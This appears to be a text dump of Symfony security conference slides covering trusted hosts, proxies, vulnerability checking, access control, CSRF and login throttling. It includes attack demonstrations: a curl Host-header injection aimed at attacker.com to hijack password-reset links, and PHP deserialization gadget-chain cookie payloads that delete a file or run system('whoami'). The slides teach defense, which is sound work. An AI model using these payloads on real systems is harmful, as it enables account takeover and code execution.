Developer at Blackfire.io
@symfony core team & security team
@jderusse
composer install --no-dev
APP_ENV=prod
// bundles.php
return [
Doctrine\Bundle\FixturesBundle\DoctrineFixturesBundle::class => ['dev' => true, 'test' => true],
Symfony\Bundle\DebugBundle\DebugBundle::class => ['dev' => true, 'test' => true],
Symfony\Bundle\MakerBundle\MakerBundle::class => ['dev' => true],
Symfony\Bundle\WebProfilerBundle\WebProfilerBundle::class => ['dev' => true, 'test' => true],
];
// conposer.json
"require-dev": {
"doctrine/doctrine-fixtures-bundle": "^3.4",
"symfony/debug-bundle": "^5.4",
"symfony/maker-bundle": "^1.34",
"symfony/web-profiler-bundle": "^5.4"
}
<p>
You asked to reset your password. <br />
This can be done by clicking the link below.
</p>
<p>
<a href="{{ url('set_password', {token: token}) }}">
Reset my password
</a>
</p>
$ curl http://acme.com/forgot-password
-X POST
-d "user=victim"
-H "host: attacker.com"
* Trying 157.131.111.93:80...
* Connected to acme.com port 80
> POST /forgot-password HTTP/1.1
> Host: attacker.com
>
> user=victim
http://attacker.com/set-password?token=...
You asked to reset your password.
This can be done by clicking the link below.
Reset my password
From: admin@acme.com
I forgot my password
attacker
framework:
trusted_hosts:
- '^acme\.com$'
- '^(www|blog)\.acme\.org$'
framework:
trusted_proxies: '192.0.0.1,10.0.0.0/8'
trusted_headers:
# - 'x-forwarded-host' Make sure the proxy really sends it
- 'x-forwarded-proto'
- 'x-forwarded-port'
title: "CVE-2020-5274: Fix Exception message escaping rendered by ErrorHandler"
link: https://symfony.com/cve-2020-5274
cve: CVE-2020-5274
branches:
4.4.x:
time: 2020-03-30 14:00:00
versions: ['>=4.4.0', '<4.4.4']
5.0.x:
time: 2020-03-30 14:00:00
versions: ['>=5.0.0', '<5.0.4']
reference: composer://symfony/error-handler
$ local-php-security-checker
Symfony Security Check Report
=============================
1 package has known vulnerabilities.
symfony/error-handler (v5.0.3)
------------------------------
* [CVE-2020-5274][]: Fix Exception message escaping rendered by ErrorHandler
[CVE-2020-5274]: https://symfony.com/cve-2020-5274
Note that this checker can only detect vulnerabilities that are referenced in the security
advisories database.
Execute this command regularly to check the newly discovered vulnerabilities.
$ symfony security:check
...
public function adminDashboard(): Response
{
$this->denyAccessUnlessGranted('ROLE_ADMIN');
}
security:
access_control:
- { path: ^/admin, roles: ROLE_ADMIN }
- { path: ^/profile, roles: ROLE_USER }
public function BlogPostEdit(Post $post): Response
{
$this->denyAccessUnlessGranted('post_edit', $post);
}
framework:
csrf_protection: ~
public function delete(Request $request): Response
{
$submittedToken = $request->request->get('token');
if (!$this->isCsrfTokenValid('delete-user', $submittedToken)) {
throw new BadRequestHttpException();
}
}
<a href="{{ path('user_delete', {
id: user.id,
csrf_token: csrf_token('delete-user')
}) }}"
>
DELETE
</a>
class TempFile
{
private string $filename;
public function __construct()
{
$this->filename = tempnam(sys_get_temp_dir(), 'test');
}
public function __destruct()
{
unlink($this->filename);
}
public function write(string $content): void {}
}
$_COOKIE['token'] = 'O:8:"TempFile":1:{s:8:"filename";s:17:"../src/Kernel.php";}';
unserialize($_COOKIE['token']);
namespace MessagingComponent;
class MessageBuffer
{
private $messages = [];
private $processor;
public function __construct(ProcessorInterface $processor) {
$this->processor = $processor;
}
public function __destruct() {
$this->processor->flush($this->messages);
}
}
namespace TestingFramework;
class Runner
{
private $serviceLocator;
public function __construct(array $serviceLocator) {
$this->serviceLocator = $serviceLocator;
}
public function __call($method, $arguments) {
return call_user_func_array(
$this->serviceLocator[$method],
$arguments,
);
}
}
[
'flush' => 'system'
]
'whoami'
$_COOKIE['token'] = 'O:32:"MessagingComponent\MessageBuffer":2:{s:42:"MessagingComponent\MessageBuffermessages";s:6:"whoami";s:43:"MessagingComponent\MessageBufferprocessor";O:23:"TestingFramework\Runner":1:{s:39:"TestingFramework\RunnerserviceLocator";a:1:{s:5:"flush";s:6:"system";}}}';
unserialize($_COOKIE['token']);
// will call
system('whoami');
# config/packages/security.yaml
security:
enable_authenticator_manager: true
firewalls:
main:
login_throttling:
max_attempts: 3
interval: '15 minutes'
It is better to know you are in danger than to think you are safe
Alphonse de Lamartine
@jderusse